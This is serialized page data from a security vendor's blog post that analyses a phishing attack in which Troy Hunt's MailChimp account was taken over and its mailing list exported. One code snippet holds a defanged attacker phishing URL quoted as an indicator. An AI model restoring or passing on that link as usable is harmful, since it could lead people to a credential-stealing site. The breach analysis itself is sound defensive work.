MailChimp",{"data":50474,"content":50475,"nodeType":860},{},[50476],{"data":50477,"marks":50478,"value":50479,"nodeType":864},{},[],"It looks like the same attackers have previously targeted ActiveCampaign, a marketing email and automation platform, based on GitHub comments from December. A domain previously flagged as malicious relating to ActiveCampaign currently redirects to the malicious MailChimp domain seen in Troy’s attack.",{"data":50481,"content":50485,"nodeType":996},{"target":50482},{"sys":50483},{"id":50484,"type":1001,"linkType":1002},"7M8W9vAYdqPN8NMU8Ug7jq",[],{"data":50487,"content":50491,"nodeType":996},{"target":50488},{"sys":50489},{"id":50490,"type":1001,"linkType":1002},"7CJfZwc9BpzIL7Fma1Y6o1",[],{"data":50493,"content":50494,"nodeType":860},{},[50495],{"data":50496,"marks":50497,"value":50498,"nodeType":864},{},[],"This could point to a broader campaign targeting similar SaaS platforms for marketing automation and email distribution.",{"data":50500,"content":50501,"nodeType":1005},{},[],{"data":50503,"content":50504,"nodeType":1009},{},[50505],{"data":50506,"marks":50507,"value":17715,"nodeType":864},{},[50508],{"type":899},{"data":50510,"content":50511,"nodeType":860},{},[50512,50516,50523,50526,50535],{"data":50513,"marks":50514,"value":50515,"nodeType":864},{},[],"MailChimp might seem an unusual target but there are a lot of ways that attackers can abuse SaaS services, as we’ve discussed at length in our public research with the ",{"data":50517,"content":50518,"nodeType":883},{"uri":6418},[50519],{"data":50520,"marks":50521,"value":47375,"nodeType":864},{},[50522],{"type":1455},{"data":50524,"marks":50525,"value":902,"nodeType":864},{},[],{"data":50527,"content":50529,"nodeType":883},{"uri":50528},"https://pushsecurity.com/resources/",[50530],{"data":50531,"marks":50532,"value":50534,"nodeType":864},{},[50533],{"type":1455},"many webinars and conference talks",{"data":50536,"marks":50537,"value":50538,"nodeType":864},{},[],". Account takeover through modern phishing attacks like the one we've analysed here is key to unlocking this attack surface. ",{"data":50540,"content":50541,"nodeType":860},{},[50542],{"data":50543,"marks":50544,"value":50545,"nodeType":864},{},[],"While the vast majority of phishing attacks that we observe do focus on core platforms like Microsoft, Google Workspace and Okta, it makes sense that attackers are broadening their focus to take advantage of the fact that phishing targeting these accounts is less obviously a target, and these accounts are often much less securely configured. But there are many ways to target the interconnected ecosystem of SaaS apps in creative ways that most organizations (and users) are seriously underprepared for. ",{"data":50547,"content":50548,"nodeType":860},{},[50549,50553,50561],{"data":50550,"marks":50551,"value":50552,"nodeType":864},{},[],"Attackers have been targeting consumers and individuals via their sprawl of internet apps for some time — are more business-focused threat groups waking up to the opportunity of targeting SaaS? After all, it’s a ",{"data":50554,"content":50555,"nodeType":883},{"uri":45206},[50556],{"data":50557,"marks":50558,"value":50560,"nodeType":864},{},[50559],{"type":1455},"great way to evade established controls elsewhere on the network and endpoints",{"data":50562,"marks":50563,"value":50564,"nodeType":864},{},[],", and you can achieve your objectives simply by logging in to (often weakly secured) user accounts.  ",{"data":50566,"content":50567,"nodeType":860},{},[50568],{"data":50569,"marks":50570,"value":50571,"nodeType":864},{},[],"The moral of the story? Phishing attacks are getting pretty sophisticated (and often much more sophisticated than this). Even security pros get phished sometimes!",{"data":50573,"content":50574,"nodeType":1116},{},[50575],{"data":50576,"content":50577,"nodeType":860},{},[50578],{"data":50579,"marks":50580,"value":50582,"nodeType":864},{},[50581],{"type":899},"This is clear indicator that we need stronger technical controls to prevent phishing. If even someone like Troy can be phished, the only reasonable conclusion is that humans will always be susceptible to phishing, no matter how much awareness training they receive. ",{"data":50584,"content":50585,"nodeType":860},{},[50586],{"data":50587,"marks":50588,"value":50589,"nodeType":864},{},[],"A big thanks to Troy for sharing his write-up of the incident!",{"data":50591,"content":50592,"nodeType":1005},{},[],{"data":50594,"content":50595,"nodeType":1009},{},[50596],{"data":50597,"marks":50598,"value":17636,"nodeType":864},{},[50599],{"type":899},{"data":50601,"content":50602,"nodeType":860},{},[50603,50607,50615],{"data":50604,"marks":50605,"value":50606,"nodeType":864},{},[],"Push takes a unique browser-based approach to detecting and intercepting phishing attacks that overcomes many of the tricks and techniques attackers use to defeat conventional anti-phishing controls. To learn more, ",{"data":50608,"content":50609,"nodeType":883},{"uri":48442},[50610],{"data":50611,"marks":50612,"value":50614,"nodeType":864},{},[50613],{"type":1455},"check out our recent blog post",{"data":50616,"marks":50617,"value":10094,"nodeType":864},{},[],{"data":50619,"content":50620,"nodeType":860},{},[50621,50625,50632],{"data":50622,"marks":50623,"value":50624,"nodeType":864},{},[],"And if you want to see how Push helps you to detect and defeat common identity attack techniques like AiTM phishing, credential stuffing, and session hijacking while improving your workforce identity posture, book some time with one of our team for a ",{"data":50626,"content":50627,"nodeType":883},{"uri":5642},[50628],{"data":50629,"marks":50630,"value":2715,"nodeType":864},{},[50631],{"type":1455},{"data":50633,"marks":50634,"value":2924,"nodeType":864},{},[],"Dissecting a recent MailChimp phishing attack","HIBP creator and well-known security person Troy Hunt recently blogged about a phish he fell for. Here’s what it tells us about how phishing is evolving. ","2025-03-28T00:00:00.000Z","dissecting-a-recent-mailchimp-phishing-attack",{"items":50640},[50641,50643],{"sys":50642,"name":6593},{"id":6592},{"sys":50644,"name":342},{"id":6596},{"items":50646},[50647],{"fullName":2736,"firstName":2737,"jobTitle":2738,"profilePicture":50648},{"url":2740},"how-consent-phishing-is-evolving","blog/how-consent-phishing-is-evolving",{"json":50652},{"data":50653,"content":50654,"nodeType":856},{},[50655],{"data":50656,"content":50657,"nodeType":860},{},[50658],{"data":50659,"marks":50660,"value":50661,"nodeType":864},{},[],"Consent phishing is where attackers trick users into authorizing malicious OAuth apps. But we’re now seeing different use cases emerge as attackers get creative to evade detection controls. ","Consent phishing is where attackers trick users into authorizing access for malicious OAuth apps. Here's how attackers are using this technique in the wild.",{"id":50664,"publishedAt":50665},"3uLWz59In1waXGcLB9cnPq","2026-08-12T11:54:19.725Z",{"items":50667},[50668,50670],{"sys":50669,"name":6593},{"id":6592},{"sys":50671,"name":342},{"id":6596},{"items":50673},[50674,50676,50678,50680,50682,50684,50686,50688,50690,50692,50694,50696,50698],{"sys":50675,"name":279,"slug":280,"tier":31},{"id":276},{"sys":50677,"name":519,"slug":520,"tier":31},{"id":516},{"sys":50679,"name":413,"slug":414,"tier":31},{"id":410},{"sys":50681,"name":342,"slug":343,"tier":31},{"id":339},{"sys":50683,"name":545,"slug":546,"tier":31},{"id":542},{"sys":50685,"name":484,"slug":485,"tier":45},{"id":481},{"sys":50687,"name":466,"slug":467,"tier":45},{"id":463},{"sys":50689,"name":324,"slug":325,"tier":45},{"id":321},{"sys":50691,"name":261,"slug":262,"tier":45},{"id":258},{"sys":50693,"name":511,"slug":512,"tier":45},{"id":508},{"sys":50695,"name":475,"slug":476,"tier":45},{"id":472},{"sys":50697,"name":351,"slug":352,"tier":45},{"id":348},{"sys":50699,"name":431,"slug":432,"tier":45},{"id":428},"tL7vLeOjP6-Zk1gOX0I9dYrUJ7xE1dGuOsosarGZtZA",{"id":50702,"title":50635,"authorsCollection":50703,"content":50708,"extension":228,"faqItemsCollection":51485,"faqTitle":59,"featured":6,"hashTags":59,"meta":51487,"metaTitle":51488,"ogImage":51489,"postType":51490,"publishedDate":50637,"relatedBlogPostsCollection":51491,"slug":50638,"stem":52805,"subtitle":59,"summary":52806,"synopsis":50636,"sys":52817,"tagsCollection":52819,"topicsCollection":52825,"__hash__":52865},"blog/blog/dissecting-a-recent-mailchimp-phishing-attack.json",{"items":50704},[50705],{"fullName":2736,"firstName":2737,"jobTitle":2738,"socialLinks":50706,"profilePicture":50707},[18135],{"url":2740},{"json":50709,"links":51368},{"data":50710,"content":50711,"nodeType":856},{},[50712,50718,50748,50754,50770,50776,50779,50786,50792,50797,50803,50808,50813,50819,50835,50840,50846,50849,50856,50872,50893,50899,50906,50912,50918,50923,50930,50946,50962,50967,50973,50978,50985,51011,51016,51022,51025,51032,51038,51054,51060,51065,51072,51078,51084,51090,51096,51156,51162,51169,51184,51189,51195,51201,51206,51212,51217,51224,51230,51235,51240,51246,51249,51256,51282,51288,51304,51310,51320,51326,51329,51336,51352],{"data":50713,"content":50714,"nodeType":860},{},[50715],{"data":50716,"marks":50717,"value":49885,"nodeType":864},{},[],{"data":50719,"content":50720,"nodeType":941},{},[50721,50730,50739],{"data":50722,"content":50723,"nodeType":945},{},[50724],{"data":50725,"content":50726,"nodeType":860},{},[50727],{"data":50728,"marks":50729,"value":49898,"nodeType":864},{},[],{"data":50731,"content":50732,"nodeType":945},{},[50733],{"data":50734,"content":50735,"nodeType":860},{},[50736],{"data":50737,"marks":50738,"value":49908,"nodeType":864},{},[],{"data":50740,"content":50741,"nodeType":945},{},[50742],{"data":50743,"content":50744,"nodeType":860},{},[50745],{"data":50746,"marks":50747,"value":49918,"nodeType":864},{},[],{"data":50749,"content":50750,"nodeType":860},{},[50751],{"data":50752,"marks":50753,"value":49925,"nodeType":864},{},[],{"data":50755,"content":50756,"nodeType":860},{},[50757,50760,50767],{"data":50758,"marks":50759,"value":49932,"nodeType":864},{},[],{"data":50761,"content":50762,"nodeType":883},{"uri":49935},[50763],{"data":50764,"marks":50765,"value":49941,"nodeType":864},{},[50766],{"type":1455},{"data":50768,"marks":50769,"value":10094,"nodeType":864},{},[],{"data":50771,"content":50772,"nodeType":860},{},[50773],{"data":50774,"marks":50775,"value":49951,"nodeType":864},{},[],{"data":50777,"content":50778,"nodeType":1005},{},[],{"data":50780,"content":50781,"nodeType":1009},{},[50782],{"data":50783,"marks":50784,"value":5002,"nodeType":864},{},[50785],{"type":899},{"data":50787,"content":50788,"nodeType":860},{},[50789],{"data":50790,"marks":50791,"value":49968,"nodeType":864},{},[],{"data":50793,"content":50796,"nodeType":996},{"target":50794},{"sys":50795},{"id":49973,"type":1001,"linkType":1002},[],{"data":50798,"content":50799,"nodeType":860},{},[50800],{"data":50801,"marks":50802,"value":49981,"nodeType":864},{},[],{"data":50804,"content":50807,"nodeType":996},{"target":50805},{"sys":50806},{"id":49986,"type":1001,"linkType":1002},[],{"data":50809,"content":50812,"nodeType":996},{"target":50810},{"sys":50811},{"id":49992,"type":1001,"linkType":1002},[],{"data":50814,"content":50815,"nodeType":860},{},[50816],{"data":50817,"marks":50818,"value":50000,"nodeType":864},{},[],{"data":50820,"content":50821,"nodeType":860},{},[50822,50825,50832],{"data":50823,"marks":50824,"value":50007,"nodeType":864},{},[],{"data":50826,"content":50827,"nodeType":883},{"uri":19131},[50828],{"data":50829,"marks":50830,"value":39752,"nodeType":864},{},[50831],{"type":1455},{"data":50833,"marks":50834,"value":32836,"nodeType":864},{},[],{"data":50836,"content":50839,"nodeType":996},{"target":50837},{"sys":50838},{"id":50022,"type":1001,"linkType":1002},[],{"data":50841,"content":50842,"nodeType":860},{},[50843],{"data":50844,"marks":50845,"value":50030,"nodeType":864},{},[],{"data":50847,"content":50848,"nodeType":1005},{},[],{"data":50850,"content":50851,"nodeType":1009},{},[50852],{"data":50853,"marks":50854,"value":50041,"nodeType":864},{},[50855],{"type":899},{"data":50857,"content":50858,"nodeType":860},{},[50859,50862,50869],{"data":50860,"marks":50861,"value":50048,"nodeType":864},{},[],{"data":50863,"content":50864,"nodeType":883},{"uri":48271},[50865],{"data":50866,"marks":50867,"value":50056,"nodeType":864},{},[50868],{"type":1455},{"data":50870,"marks":50871,"value":50060,"nodeType":864},{},[],{"data":50873,"content":50874,"nodeType":941},{},[50875,50884],{"data":50876,"content":50877,"nodeType":945},{},[50878],{"data":50879,"content":50880,"nodeType":860},{},[50881],{"data":50882,"marks":50883,"value":50073,"nodeType":864},{},[],{"data":50885,"content":50886,"nodeType":945},{},[50887],{"data":50888,"content":50889,"nodeType":860},{},[50890],{"data":50891,"marks":50892,"value":50083,"nodeType":864},{},[],{"data":50894,"content":50895,"nodeType":860},{},[50896],{"data":50897,"marks":50898,"value":50090,"nodeType":864},{},[],{"data":50900,"content":50901,"nodeType":1312},{},[50902],{"data":50903,"marks":50904,"value":50098,"nodeType":864},{},[50905],{"type":899},{"data":50907,"content":50908,"nodeType":860},{},[50909],{"data":50910,"marks":50911,"value":50105,"nodeType":864},{},[],{"data":50913,"content":50914,"nodeType":860},{},[50915],{"data":50916,"marks":50917,"value":50112,"nodeType":864},{},[],{"data":50919,"content":50922,"nodeType":996},{"target":50920},{"sys":50921},{"id":50117,"type":1001,"linkType":1002},[],{"data":50924,"content":50925,"nodeType":1312},{},[50926],{"data":50927,"marks":50928,"value":50126,"nodeType":864},{},[50929],{"type":899},{"data":50931,"content":50932,"nodeType":860},{},[50933,50936,50943],{"data":50934,"marks":50935,"value":50133,"nodeType":864},{},[],{"data":50937,"content":50938,"nodeType":883},{"uri":48183},[50939],{"data":50940,"marks":50941,"value":50141,"nodeType":864},{},[50942],{"type":1455},{"data":50944,"marks":50945,"value":50145,"nodeType":864},{},[],{"data":50947,"content":50948,"nodeType":860},{},[50949,50952,50959],{"data":50950,"marks":50951,"value":50152,"nodeType":864},{},[],{"data":50953,"content":50954,"nodeType":883},{"uri":48183},[50955],{"data":50956,"marks":50957,"value":50160,"nodeType":864},{},[50958],{"type":1455},{"data":50960,"marks":50961,"value":50164,"nodeType":864},{},[],{"data":50963,"content":50966,"nodeType":996},{"target":50964},{"sys":50965},{"id":50169,"type":1001,"linkType":1002},[],{"data":50968,"content":50969,"nodeType":860},{},[50970],{"data":50971,"marks":50972,"value":50177,"nodeType":864},{},[],{"data":50974,"content":50977,"nodeType":996},{"target":50975},{"sys":50976},{"id":50182,"type":1001,"linkType":1002},[],{"data":50979,"content":50980,"nodeType":1312},{},[50981],{"data":50982,"marks":50983,"value":50191,"nodeType":864},{},[50984],{"type":899},{"data":50986,"content":50987,"nodeType":860},{},[50988,50991,50998,51001,51008],{"data":50989,"marks":50990,"value":50198,"nodeType":864},{},[],{"data":50992,"content":50993,"nodeType":883},{"uri":50201},[50994],{"data":50995,"marks":50996,"value":50207,"nodeType":864},{},[50997],{"type":1455},{"data":50999,"marks":51000,"value":50211,"nodeType":864},{},[],{"data":51002,"content":51003,"nodeType":883},{"uri":6418},[51004],{"data":51005,"marks":51006,"value":50219,"nodeType":864},{},[51007],{"type":1455},{"data":51009,"marks":51010,"value":50223,"nodeType":864},{},[],{"data":51012,"content":51015,"nodeType":996},{"target":51013},{"sys":51014},{"id":50228,"type":1001,"linkType":1002},[],{"data":51017,"content":51018,"nodeType":860},{},[51019],{"data":51020,"marks":51021,"value":50236,"nodeType":864},{},[],{"data":51023,"content":51024,"nodeType":1005},{},[],{"data":51026,"content":51027,"nodeType":1009},{},[51028],{"data":51029,"marks":51030,"value":50247,"nodeType":864},{},[51031],{"type":899},{"data":51033,"content":51034,"nodeType":860},{},[51035],{"data":51036,"marks":51037,"value":50254,"nodeType":864},{},[],{"data":51039,"content":51040,"nodeType":860},{},[51041,51044,51051],{"data":51042,"marks":51043,"value":50261,"nodeType":864},{},[],{"data":51045,"content":51046,"nodeType":883},{"uri":50264},[51047],{"data":51048,"marks":51049,"value":50270,"nodeType":864},{},[51050],{"type":1455},{"data":51052,"marks":51053,"value":50274,"nodeType":864},{},[],{"data":51055,"content":51056,"nodeType":860},{},[51057],{"data":51058,"marks":51059,"value":50281,"nodeType":864},{},[],{"data":51061,"content":51064,"nodeType":996},{"target":51062},{"sys":51063},{"id":50286,"type":1001,"linkType":1002},[],{"data":51066,"content":51067,"nodeType":1312},{},[51068],{"data":51069,"marks":51070,"value":50295,"nodeType":864},{},[51071],{"type":899},{"data":51073,"content":51074,"nodeType":860},{},[51075],{"data":51076,"marks":51077,"value":50302,"nodeType":864},{},[],{"data":51079,"content":51080,"nodeType":860},{},[51081],{"data":51082,"marks":51083,"value":50309,"nodeType":864},{},[],{"data":51085,"content":51086,"nodeType":860},{},[51087],{"data":51088,"marks":51089,"value":50316,"nodeType":864},{},[],{"data":51091,"content":51092,"nodeType":860},{},[51093],{"data":51094,"marks":51095,"value":50323,"nodeType":864},{},[],{"data":51097,"content":51098,"nodeType":941},{},[51099,51128,51147],{"data":51100,"content":51101,"nodeType":945},{},[51102],{"data":51103,"content":51104,"nodeType":860},{},[51105,51108,51115,51118,51125],{"data":51106,"marks":51107,"value":50336,"nodeType":864},{},[],{"data":51109,"content":51110,"nodeType":883},{"uri":3751},[51111],{"data":51112,"marks":51113,"value":43767,"nodeType":864},{},[51114],{"type":1455},{"data":51116,"marks":51117,"value":50347,"nodeType":864},{},[],{"data":51119,"content":51120,"nodeType":883},{"uri":17536},[51121],{"data":51122,"marks":51123,"value":44266,"nodeType":864},{},[51124],{"type":1455},{"data":51126,"marks":51127,"value":50358,"nodeType":864},{},[],{"data":51129,"content":51130,"nodeType":945},{},[51131],{"data":51132,"content":51133,"nodeType":860},{},[51134,51137,51144],{"data":51135,"marks":51136,"value":50368,"nodeType":864},{},[],{"data":51138,"content":51139,"nodeType":883},{"uri":50371},[51140],{"data":51141,"marks":51142,"value":50377,"nodeType":864},{},[51143],{"type":1455},{"data":51145,"marks":51146,"value":50381,"nodeType":864},{},[],{"data":51148,"content":51149,"nodeType":945},{},[51150],{"data":51151,"content":51152,"nodeType":860},{},[51153],{"data":51154,"marks":51155,"value":50391,"nodeType":864},{},[],{"data":51157,"content":51158,"nodeType":860},{},[51159],{"data":51160,"marks":51161,"value":50398,"nodeType":864},{},[],{"data":51163,"content":51164,"nodeType":1312},{},[51165],{"data":51166,"marks":51167,"value":50406,"nodeType":864},{},[51168],{"type":899},{"data":51170,"content":51171,"nodeType":860},{},[51172,51175,51181],{"data":51173,"marks":51174,"value":50413,"nodeType":864},{},[],{"data":51176,"content":51177,"nodeType":883},{"uri":50416},[51178],{"data":51179,"marks":51180,"value":50421,"nodeType":864},{},[],{"data":51182,"marks":51183,"value":50425,"nodeType":864},{},[],{"data":51185,"content":51188,"nodeType":996},{"target":51186},{"sys":51187},{"id":50430,"type":1001,"linkType":1002},[],{"data":51190,"content":51191,"nodeType":860},{},[51192],{"data":51193,"marks":51194,"value":50438,"nodeType":864},{},[],{"data":51196,"content":51197,"nodeType":860},{},[51198],{"data":51199,"marks":51200,"value":50445,"nodeType":864},{},[],{"data":51202,"content":51205,"nodeType":996},{"target":51203},{"sys":51204},{"id":50450,"type":1001,"linkType":1002},[],{"data":51207,"content":51208,"nodeType":860},{},[51209],{"data":51210,"marks":51211,"value":50458,"nodeType":864},{},[],{"data":51213,"content":51216,"nodeType":996},{"target":51214},{"sys":51215},{"id":50463,"type":1001,"linkType":1002},[],{"data":51218,"content":51219,"nodeType":1312},{},[51220],{"data":51221,"marks":51222,"value":50472,"nodeType":864},{},[51223],{"type":899},{"data":51225,"content":51226,"nodeType":860},{},[51227],{"data":51228,"marks":51229,"value":50479,"nodeType":864},{},[],{"data":51231,"content":51234,"nodeType":996},{"target":51232},{"sys":51233},{"id":50484,"type":1001,"linkType":1002},[],{"data":51236,"content":51239,"nodeType":996},{"target":51237},{"sys":51238},{"id":50490,"type":1001,"linkType":1002},[],{"data":51241,"content":51242,"nodeType":860},{},[51243],{"data":51244,"marks":51245,"value":50498,"nodeType":864},{},[],{"data":51247,"content":51248,"nodeType":1005},{},[],{"data":51250,"content":51251,"nodeType":1009},{},[51252],{"data":51253,"marks":51254,"value":17715,"nodeType":864},{},[51255],{"type":899},{"data":51257,"content":51258,"nodeType":860},{},[51259,51262,51269,51272,51279],{"data":51260,"marks":51261,"value":50515,"nodeType":864},{},[],{"data":51263,"content":51264,"nodeType":883},{"uri":6418},[51265],{"data":51266,"marks":51267,"value":47375,"nodeType":864},{},[51268],{"type":1455},{"data":51270,"marks":51271,"value":902,"nodeType":864},{},[],{"data":51273,"content":51274,"nodeType":883},{"uri":50528},[51275],{"data":51276,"marks":51277,"value":50534,"nodeType":864},{},[51278],{"type":1455},{"data":51280,"marks":51281,"value":50538,"nodeType":864},{},[],{"data":51283,"content":51284,"nodeType":860},{},[51285],{"data":51286,"marks":51287,"value":50545,"nodeType":864},{},[],{"data":51289,"content":51290,"nodeType":860},{},[51291,51294,51301],{"data":51292,"marks":51293,"value":50552,"nodeType":864},{},[],{"data":51295,"content":51296,"nodeType":883},{"uri":45206},[51297],{"data":51298,"marks":51299,"value":50560,"nodeType":864},{},[51300],{"type":1455},{"data":51302,"marks":51303,"value":50564,"nodeType":864},{},[],{"data":51305,"content":51306,"nodeType":860},{},[51307],{"data":51308,"marks":51309,"value":50571,"nodeType":864},{},[],{"data":51311,"content":51312,"nodeType":1116},{},[51313],{"data":51314,"content":51315,"nodeType":860},{},[51316],{"data":51317,"marks":51318,"value":50582,"nodeType":864},{},[51319],{"type":899},{"data":51321,"content":51322,"nodeType":860},{},[51323],{"data":51324,"marks":51325,"value":50589,"nodeType":864},{},[],{"data":51327,"content":51328,"nodeType":1005},{},[],{"data":51330,"content":51331,"nodeType":1009},{},[51332],{"data":51333,"marks":51334,"value":17636,"nodeType":864},{},[51335],{"type":899},{"data":51337,"content":51338,"nodeType":860},{},[51339,51342,51349],{"data":51340,"marks":51341,"value":50606,"nodeType":864},{},[],{"data":51343,"content":51344,"nodeType":883},{"uri":48442},[51345],{"data":51346,"marks":51347,"value":50614,"nodeType":864},{},[51348],{"type":1455},{"data":51350,"marks":51351,"value":10094,"nodeType":864},{},[],{"data":51353,"content":51354,"nodeType":860},{},[51355,51358,51365],{"data":51356,"marks":51357,"value":50624,"nodeType":864},{},[],{"data":51359,"content":51360,"nodeType":883},{"uri":5642},[51361],{"data":51362,"marks":51363,"value":2715,"nodeType":864},{},[51364],{"type":1455},{"data":51366,"marks":51367,"value":2924,"nodeType":864},{},[],{"entries":51369},{"hyperlink":51370,"inline":51371,"block":51372},[],[],[51373,51381,51388,51414,51421,51426,51431,51438,51444,51452,51459,51467,51472,51479],{"sys":51374,"__typename":1724,"title":51375,"caption":51376,"layoutMode":59,"file":51377},{"id":49973},"Mailchimp phishing email","Phishing email mimicking the design of MailChimp emails. ",{"url":51378,"width":51379,"height":51380},"https://images.ctfassets.net/y1cdw1ablpvd/GgbsjVF5x9BcsSuR4Gc7s/8f2931a02751edd5e0ebe49fc14540d5/image1.png",1216,1473,{"sys":51382,"__typename":1724,"title":51383,"caption":51384,"layoutMode":59,"file":51385},{"id":49986},"Mailchimp blog image 2","The sender address is from a custom domain that doesn't match MailChimp.",{"url":51386,"width":51387,"height":282},"https://images.ctfassets.net/y1cdw1ablpvd/13as7RS1LRKBQYUVsrfaEq/ffd3dac7a39db009ba5f93e4b448a752/image3.png",450,{"sys":51389,"__typename":1740,"content":51390,"name":51413,"title":59},{"id":49992},{"json":51391},{"data":51392,"content":51393,"nodeType":856},{},[51394],{"data":51395,"content":51396,"nodeType":860},{},[51397,51401,51410],{"data":51398,"marks":51399,"value":51400,"nodeType":864},{},[],"It’s notable that this email wasn’t actually sent from MailChimp as we’ve seen with other recent attacks where attackers have used third-party SaaS services to send their emails, making them appear more legitimate (such as in ",{"data":51402,"content":51404,"nodeType":883},{"uri":51403},"https://thehackernews.com/2024/12/hubphish-exploits-hubspot-tools-to.html",[51405],{"data":51406,"marks":51407,"value":51409,"nodeType":864},{},[51408],{"type":1455},"recent campaigns leveraging HubSpot and DocuSign",{"data":51411,"marks":51412,"value":32836,"nodeType":864},{},[],"Mailchimp blog insight box 1",{"sys":51415,"__typename":1724,"title":51416,"caption":51417,"layoutMode":59,"file":51418},{"id":50022},"Mailchimp blog image 3","Suspicious activity notifications sent at 06:59, 07:00, and 07:01 show how quickly the attack was executed.",{"url":51419,"width":1736,"height":51420},"https://images.ctfassets.net/y1cdw1ablpvd/32prbL1kkdUuSHt7iZv0i9/6dc274e7ff9b22993f9e633c04f05dc5/image10.png",352,{"sys":51422,"__typename":1724,"title":51423,"caption":51424,"layoutMode":59,"file":51425},{"id":50117},"Mailchimp blog image 4","The attacker enumerated Troy's dedicated email used for MailChimp.",{"url":51386,"width":51387,"height":282},{"sys":51427,"__typename":1724,"title":51428,"caption":51429,"layoutMode":59,"file":51430},{"id":50169},"Mailchimp blog image 5","Cloudflare Turnstile is often used to prevent security bots from analysing the attacker's phishing page. ",{"url":48463,"width":48464,"height":48465},{"sys":51432,"__typename":1724,"title":51433,"caption":51434,"layoutMode":59,"file":51435},{"id":50182},"Mailchimp blog image 6","The site is now being flagged as malicious.",{"url":51436,"width":1736,"height":51437},"https://images.ctfassets.net/y1cdw1ablpvd/7pVNsGvPJC1hMGGPuwznYX/e06f3881f8a6fb8742dd9c95068f4f25/image5.png",1540,{"sys":51439,"__typename":1724,"title":51433,"caption":51440,"layoutMode":59,"file":51441},{"id":50228},"The attacker created an API key for backdoor access to the app.",{"url":51442,"width":1736,"height":51443},"https://images.ctfassets.net/y1cdw1ablpvd/4kQE2MpMXV5edYTZ567NpA/45e5c8d26510959dd91440508280b82b/image9.png",333,{"sys":51445,"__typename":1724,"title":51446,"caption":51447,"layoutMode":59,"file":51448},{"id":50286},"Mailchimp blog image 7","Data captured by the attacker from the exported mailing list.",{"url":51449,"width":51450,"height":51451},"https://images.ctfassets.net/y1cdw1ablpvd/1uOXeOFOEglg6Dzv3kPNud/bd6957fef3cfcdffe02e00f3a9f54b49/image8.png",1852,276,{"sys":51453,"__typename":1724,"title":51454,"caption":51455,"layoutMode":59,"file":51456},{"id":50430},"Mailchimp blog image 8","MailChimp only offers 'Continue with Google' as an SSO option.",{"url":51457,"width":1736,"height":51458},"https://images.ctfassets.net/y1cdw1ablpvd/13VC1YYs1ts8aVO6cbaovA/6cdcf47472e267c25625171a6b8e9653/image7.png",977,{"sys":51460,"__typename":1724,"title":51461,"caption":51462,"layoutMode":59,"file":51463},{"id":50450},"Mailchimp blog image 9","MailChimp only supports phishable MFA factors",{"url":51464,"width":51465,"height":51466},"https://images.ctfassets.net/y1cdw1ablpvd/2FcpNMwmFmmyp1P9NZ9aCx/9e6d9a407d9db243f2f210d39013c731/image6.png",600,410,{"sys":51468,"__typename":1717,"type":1718,"ctaText":51469,"buttonLabel":51470,"buttonColour":1721,"buttonUrl":51471},{"id":50463},"Learn more about the common security gaps created by app developers that contribute to SaaS identity breaches.","Read the blog","https://pushsecurity.com/blog/minimum-viable-identity-security/",{"sys":51473,"__typename":1724,"title":51474,"caption":59,"layoutMode":59,"file":51475},{"id":50484},"Mailchimp blog image 10",{"url":51476,"width":51477,"height":51478},"https://images.ctfassets.net/y1cdw1ablpvd/5nzmVTjx3clYWDr0hlKPu2/aac584ccda7de2c15d704b14ee0d8c6e/image4.png",1400,1620,{"sys":51480,"__typename":51481,"name":51482,"type":51483,"syntax":51484},{"id":50490},"CodeBlockComponent","Mailchimp blog code snippet","shell","hxxps://groupf.emlnk9.com/lt.php?x=3DZy~GE6KXOf6a4s-tI6hRVt3H2piwDuwehiY5THVXeZ5sF_y0y.zOlz5X2gk.~wjvYxZHP",{"items":51486},[],{},"When even Troy Hunt got phished",{"url":51378},"breach-analysis",{"items":51492},[51493,51885,52519],{"__typename":2059,"sys":51494,"content":51495,"title":47967,"synopsis":50662,"hashTags":59,"publishedDate":48529,"slug":50649,"tagsCollection":51875,"authorsCollection":51881},{"id":50664},{"json":51496},{"data":51497,"content":51498,"nodeType":856},{},[51499,51525,51541,51547,51553,51556,51563,51569,51574,51579,51584,51590,51606,51611,51614,51621,51627,51633,51639,51644,51650,51656,51661,51667,51683,51688,51694,51697,51704,51710,51715,51721,51762,51767,51773,51776,51783,51789,51795,51800,51805,51810,51813,51820,51826,51831,51837,51843,51846,51853,51859],{"data":51500,"content":51501,"nodeType":860},{},[51502,51505,51512,51515,51522],{"data":51503,"marks":51504,"value":21,"nodeType":864},{},[],{"data":51506,"content":51507,"nodeType":883},{"uri":22596},[51508],{"data":51509,"marks":51510,"value":26966,"nodeType":864},{},[51511],{"type":1455},{"data":51513,"marks":51514,"value":47993,"nodeType":864},{},[],{"data":51516,"content":51517,"nodeType":883},{"uri":47996},[51518],{"data":51519,"marks":51520,"value":47375,"nodeType":864},{},[51521],{"type":1455},{"data":51523,"marks":51524,"value":48005,"nodeType":864},{},[],{"data":51526,"content":51527,"nodeType":860},{},[51528,51531,51538],{"data":51529,"marks":51530,"value":48012,"nodeType":864},{},[],{"data":51532,"content":51533,"nodeType":883},{"uri":48015},[51534],{"data":51535,"marks":51536,"value":48021,"nodeType":864},{},[51537],{"type":1455},{"data":51539,"marks":51540,"value":48025,"nodeType":864},{},[],{"data":51542,"content":51543,"nodeType":860},{},[51544],{"data":51545,"marks":51546,"value":48032,"nodeType":864},{},[],{"data":51548,"content":51549,"nodeType":860},{},[51550],{"data":51551,"marks":51552,"value":48039,"nodeType":864},{},[],{"data":51554,"content":51555,"nodeType":1005},{},[],{"data":51557,"content":51558,"nodeType":1009},{},[51559],{"data":51560,"marks":51561,"value":48050,"nodeType":864},{},[51562],{"type":899},{"data":51564,"content":51565,"nodeType":860},{},[51566],{"data":51567,"marks":51568,"value":48057,"nodeType":864},{},[],{"data":51570,"content":51573,"nodeType":996},{"target":51571},{"sys":51572},{"id":48062,"type":1001,"linkType":1002},[],{"data":51575,"content":51578,"nodeType":996},{"target":51576},{"sys":51577},{"id":48068,"type":1001,"linkType":1002},[],{"data":51580,"content":51583,"nodeType":996},{"target":51581},{"sys":51582},{"id":48074,"type":1001,"linkType":1002},[],{"data":51585,"content":51586,"nodeType":860},{},[51587],{"data":51588,"marks":51589,"value":48082,"nodeType":864},{},[],{"data":51591,"content":51592,"nodeType":860},{},[51593,51596,51603],{"data":51594,"marks":51595,"value":48089,"nodeType":864},{},[],{"data":51597,"content":51598,"nodeType":883},{"uri":48092},[51599],{"data":51600,"marks":51601,"value":48098,"nodeType":864},{},[51602],{"type":1455},{"data":51604,"marks":51605,"value":48102,"nodeType":864},{},[],{"data":51607,"content":51610,"nodeType":996},{"target":51608},{"sys":51609},{"id":48107,"type":1001,"linkType":1002},[],{"data":51612,"content":51613,"nodeType":1005},{},[],{"data":51615,"content":51616,"nodeType":1009},{},[51617],{"data